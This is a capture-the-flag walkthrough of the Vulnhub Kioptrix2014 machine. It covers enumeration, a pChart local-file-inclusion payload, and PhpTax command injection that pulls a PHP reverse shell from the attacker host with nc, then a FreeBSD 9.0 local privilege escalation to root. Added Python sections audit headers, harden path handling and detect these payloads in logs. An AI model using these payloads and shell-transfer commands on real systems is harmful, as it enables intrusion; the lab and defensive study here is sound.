Vulnhub

Kioptrix2014

Enumeration

As always, let’s start with a scan.

nmap -Pn -sS -sC -vv -T 4 -p- 192.168.1.121
Nmap scan report for kioptrix2014 (192.168.1.134)
Host is up (0.00024s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21
OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21
OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:04:AC:9C (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8
cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms kioptrix2014 (192.168.1.134)

While that was running, I checked whether it had a website.
It did: the page contained a simple “It works!”

I looked at the source code.

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

Looking at the comment, I decided to append it to the URL. It redirected to the following URL:

http://192.168.1.134/pChart2.1.3/examples/index.php

The site contains a lot of example scripts for creating graphs.

Dirb

I decided to run dirb to see if it finds something interesting.

dirb http://192.168.1.134/pChart2.1.3/ /usr/share/dirb/wordlists/common.txt 
dirb http://192.168.1.134/ /usr/share/dirb/wordlists/common.txt 

I didn’t get anything particularly good: a bunch of indexable directories that didn’t contain anything interesting.

Nikto

So now nikto; let’s see what it has to say.

nikto -h 192.168.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.134
+ Target Hostname:    192.168.1.134
+ Target Port:        80
+ Start Time:         2017-05-17 05:00:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
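Two of the nikto findings deserve a closer look before chasing them: the version-comparison rule behind the mod_ssl finding, and the missing hardening headers. As an added example (not part of the original write-up, and not nikto’s own code), the Python script below parses the Server banner quoted above into product/version pairs, explains which mod_ssl line the banner belongs to (Apache 2.x reports its bundled mod_ssl with the httpd version number, whereas the 2.8.x numbering nikto compares against belongs to the separate mod_ssl for Apache 1.3), and audits a set of response headers for the headers and the TRACE method nikto flagged. The banner is the one from the scan; the response headers are constructed.

```python
import re

# Constructed sample, copied from the Server banner nikto reported above.
SERVER_BANNER = "Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8"

# Constructed response headers for the "It works!" page: the hardening
# headers nikto complains about are absent and TRACE is advertised.
SAMPLE_HEADERS = {
    "Server": SERVER_BANNER,
    "Content-Type": "text/html",
    "Allow": "GET, HEAD, POST, OPTIONS, TRACE",
}

# product/version tokens; parenthesised platform tokens like "(FreeBSD)" do not match
_PRODUCT = re.compile(r"([A-Za-z_]+)/([0-9][0-9A-Za-z.\-]*)")


def parse_server_banner(banner):
    """Split an Apache-style Server banner into a {product: version} mapping."""
    return {name: ver for name, ver in _PRODUCT.findall(banner)}


def version_key(ver):
    """Numeric prefix of each dotted component, so '0.9.8q' -> (0, 9, 8).
    Letter suffixes (OpenSSL's 'q') are dropped; they do not matter here."""
    parts = []
    for comp in ver.split("."):
        m = re.match(r"\d+", comp)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def mod_ssl_lineage(products):
    """Explain the mod_ssl finding: nikto compares mod_ssl/2.2.21 against 2.8.7,
    but Apache 2.x ships mod_ssl with the httpd version number, while the 2.8.x
    numbering belongs to the separate mod_ssl for Apache 1.3 that the OpenFuck
    exploits target. Returns which line this banner belongs to."""
    apache = products.get("Apache")
    modssl = products.get("mod_ssl")
    if apache is None or modssl is None:
        return "unknown"
    if version_key(apache) >= (2,) and version_key(modssl) == version_key(apache):
        return "bundled-apache2"
    return "standalone-apache1"


# headers nikto flagged as missing, with the protection each one provides
HARDENING_HEADERS = {
    "X-Frame-Options": "clickjacking protection",
    "X-Content-Type-Options": "stops MIME sniffing",
    "X-XSS-Protection": "legacy browser XSS filter hint",
}


def audit_headers(headers):
    """Return a list of findings for a response header mapping
    (header names are matched case-insensitively)."""
    lower = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, purpose in HARDENING_HEADERS.items():
        if name.lower() not in lower:
            findings.append(f"missing {name} ({purpose})")
    methods = {m.strip().upper() for m in lower.get("allow", "").split(",") if m.strip()}
    if "TRACE" in methods:
        findings.append("TRACE method enabled (Apache: TraceEnable off)")
    return findings


if __name__ == "__main__":
    products = parse_server_banner(SERVER_BANNER)
    print(products)
    print("mod_ssl lineage:", mod_ssl_lineage(products))
    for finding in audit_headers(SAMPLE_HEADERS):
        print("-", finding)
```

Run against the sample, the banner classifies as the Apache 2 bundled mod_ssl, which is the same conclusion the write-up reaches below after reading the exploit source; the header audit reports the three missing headers and the enabled TRACE method.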

mod_ssl/2.2.21 seems vulnerable. I used searchsploit to look up mod_ssl.

searchsploit mod_ssl
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)                                                                              | ./unix/remote/764.c
Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                                                        | ./multiple/dos/21575.txt
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)                                                                                | ./unix/remote/21671.c
Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit                                              | ./unix/remote/40347.txt
Apache/mod_ssl 2.0.x - Remote Denial of Service                                                                                                   | ./linux/dos/24590.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

We got OpenFuckV2, which looks promising, but after reading the source code it turns out to target Apache 1.x, not Apache 2.x.

pChart2.1.3

So I decided to searchsploit pChart.

searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                                                                           | ./php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

We got a hit. After reading the file, it looks like the web app is vulnerable to LFI (local file inclusion).

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

And it does work. I looked at /etc/passwd and other typical files. I had to google where a default Apache 2 install keeps its configuration on FreeBSD. We know it’s a FreeBSD machine running Apache 2.2.21, and the location is /usr/local/etc/apache22/httpd.conf. That file contains the virtual host configuration; the interesting part is near the end of the file.

http://192.168.1.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

    <Directory "/usr/local/www/apache22/data2">
        Options Indexes FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>

It looks like we need to change our browser’s User-Agent to Mozilla/4.0.
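The pChart issue above is a path-containment failure: a request parameter is joined onto a directory and included, and encoded `..` segments walk out of that directory. As an added example (not pChart’s code and not part of the original write-up), the Python below shows a simplified model of that vulnerable shape next to a hardened resolver that rejects the exploit-db payload quoted above. The base directory is assumed from the install path the write-up later reveals (/usr/local/www/apache22/data/pChart2.1.3) plus the examples/ directory seen in the URL; the legitimate script name is constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed base directory for the example scripts: the post shows pChart under
# /usr/local/www/apache22/data/pChart2.1.3 and the examples served from
# .../examples/, so that is what is used here.
SCRIPT_ROOT = "/usr/local/www/apache22/data/pChart2.1.3/examples"

# The exploit-db payload quoted above, in the encoded form it arrives in.
TRAVERSAL_PAYLOAD = "%2f..%2f..%2fetc/passwd"

# A bare file name: no slash, no backslash, no percent sign, must end in .php.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.\-]+\.php$")


def resolve_script_unsafe(script_param, root=SCRIPT_ROOT):
    """Simplified model of the vulnerable shape (not pChart's actual code):
    the parameter is glued onto a base path and handed to include().
    Which file is reached depends on the include base; what matters is that
    '..' segments walk out of the intended directory."""
    return posixpath.normpath(root + "/" + unquote(script_param))


def resolve_script(script_param, root=SCRIPT_ROOT):
    """Hardened mapping of the Script parameter onto a file under root.
    Returns the absolute path, or None if the name is rejected.
    Two independent checks: an allowlist on the decoded name, then a
    containment test on the normalised path, so an encoded traversal
    cannot slip past either one alone."""
    name = unquote(script_param)  # %2f -> '/', as the server would decode it
    if not SAFE_NAME.match(name):
        return None
    candidate = posixpath.normpath(posixpath.join(root, name))
    if not candidate.startswith(root + "/"):
        return None
    return candidate


def escapes_root(path, root=SCRIPT_ROOT):
    """True when a resolved path lies outside root."""
    return not path.startswith(root + "/")


if __name__ == "__main__":
    # "example.sample.php" is a constructed legitimate script name
    for param in ("example.sample.php", TRAVERSAL_PAYLOAD, "..%2f..%2fetc%2fpasswd"):
        unsafe = resolve_script_unsafe(param)
        print(f"{param!r}: unsafe -> {unsafe} (escapes root: {escapes_root(unsafe)}),"
              f" hardened -> {resolve_script(param)}")
```

The allowlist alone would be enough for this parameter, but keeping the containment test as well means a future relaxation of the name pattern (say, to allow subdirectories) still cannot reach outside the examples directory. The same shape of check applies to any parameter that names a file on disk.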

Phptax

So we have a website that looks like it is made for submitting taxes. I played around with
it for a few minutes and decided to searchsploit it.

searchsploit phptax
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection                                                                                              | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution                                                                                                                | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution                                                                                 | ./php/webapps/25849.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

We found more vulnerable software.

So it looks like we can execute commands directly from the URL:

http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

This would create a reverse TCP connection, but it will not work on our
machine because the target’s nc version does not support the -e option.

If we look at 21665.txt, we can see that it converts the file and puts it
in data/pdf/. If we navigate to that page we’ll see all the previous uploads.

Maybe we can try to upload a PHP reverse shell.
This one was tricky for me; it took forever to figure out a way in.

Looking at httpd-error.log from the previous exploit attempt, I saw that the script looks for a file located in the files folder.

That directory is browsable, and the index lists all the files the script uses to create the PDF/PNG output. So I tried writing something into one of them using echo.

http://192.168.1.134:8080/phptax/index.php?pfilez=yp;echo%20%22YO%22%20%3E%3E%20.files/1040d-pg1.calc;&pdf=make

This would append the word YO to the end of the file ./files/1040d-pg1.calc, and it did. Now that I know I can write into it, I’ll set up an nc listener to transfer a file:

nc -nlv 1234 < php-reverse-shell

http://192.168.1.134:8080/phptax/index.php?pfilez=yp;nc%20192.168.1.148%201234%20%3E%3E%20./files/shell.txt.php;&pdf=make

Using that URL I managed to upload my reverse shell. The only thing left is to set up a listener and load me.txt.php.
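Every step of the pChart and phptax chains above leaves a single GET request in the Apache access log, and both are easy to spot from the query string alone: a `..` segment in a parameter that names a file, or a shell separator such as `;` in a parameter that ends up in a command line. As an added example (not part of the original write-up), the Python below runs that detection over constructed combined-format log lines modelled on the requests shown in this post, plus two benign requests to show the rules stay quiet on normal traffic.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format lines modelled on the requests in this
# post (the pChart traversal and the phptax pfilez injection), plus two benign
# requests. IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
192.168.1.148 - - [17/May/2017:05:12:01 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
192.168.1.148 - - [17/May/2017:05:13:44 -0400] "GET /phptax/index.php?pfilez=yp;echo%20%22YO%22%20%3E%3E%20./files/1040d-pg1.calc;&pdf=make HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.168.1.148 - - [17/May/2017:05:14:02 -0400] "GET /phptax/index.php?pfilez=1040d1-pg1.tob&pdf=make HTTP/1.1" 200 3021 "-" "Mozilla/4.0"
192.168.1.148 - - [17/May/2017:05:15:10 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.sample.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# a '..' path segment anywhere in a decoded parameter value
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# characters a shell would treat as command separators or redirections
SHELL_META = re.compile(r"[;|`$&<>\n]")


def query_params(target):
    """Decode the query string into (key, value) pairs. Splitting on '&' is
    done by hand so that ';' inside a value survives regardless of how the
    installed parse_qsl treats it."""
    pairs = []
    for chunk in urlsplit(target).query.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((unquote(key), unquote(value)))
    return pairs


def inspect_line(line):
    """Parse one access-log line and return a record with any findings,
    or None for lines that do not match the combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for key, value in query_params(m["target"]):
        if TRAVERSAL.search(value):
            findings.append(f"traversal in {key}")
        if SHELL_META.search(value):
            findings.append(f"shell metacharacter in {key}")
    return {
        "ip": m["ip"],
        "path": urlsplit(m["target"]).path,
        "status": int(m["status"]),
        "findings": findings,
    }


def scan_log(text):
    """Return only the parsed lines that produced at least one finding."""
    hits = []
    for line in text.splitlines():
        rec = inspect_line(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["path"], ", ".join(hit["findings"]))
```

Note that the status code is no help here: both malicious requests returned 200, exactly like the benign ones, which is why the rules look at decoded parameter values rather than at the response. The same rules would also fire on the write-up’s later file-transfer request, since it carries both `;` and `>>` in pfilez.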

Weevely the gorgeous

First, I’ll upload a weevely shell, because it is a much nicer shell than a
plain reverse shell. I tried uploading it to the same location as the previous
reverse shell, but weevely wouldn’t connect. I guess the browser-agent check
is blocking it, since I’m getting a 403 error. So I’ll use the first reverse
shell to upload the second one.

I’ll browse to /usr/local/www/apache22/data/pChart2.1.3, the location of the
first website we encountered, and set up another nc listener to transfer the
file. I tried curl and wget, and it looks like we can’t use them.

On the Kali box:

weevely generate me.php toor
nc -nlv 1234 < me.php

On Kioptrix:

pwd
/usr/local/www/apache22/data/pChart2.1.3

nc 192.168.1.148 1234 > me.php

On the Kali box:

weevely http://192.168.1.134/pChart2.1.3/me.php toor

Well… nothing seems to work. I tried transferring it to multiple places under multiple file names, and nada. I guess it’s Python? Let’s move on then.

Enumeration

So, like always, first things first:

uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64

FreeBSD 9.0

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation                                                                                              | ./freebsd/local/26368.c
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                                                                                            | ./freebsd/local/28718.c
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

After reading both of them, I decided to try the first one, 26368.c. I used nc again to transfer it and gcc to compile it.

nc 192.168.1.148 1234 > exploit.c
gcc exploit.c
./a.out

id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

Well yeah, that’s good game.

It literally took me forever to get a shell on the machine. Like FOREVER!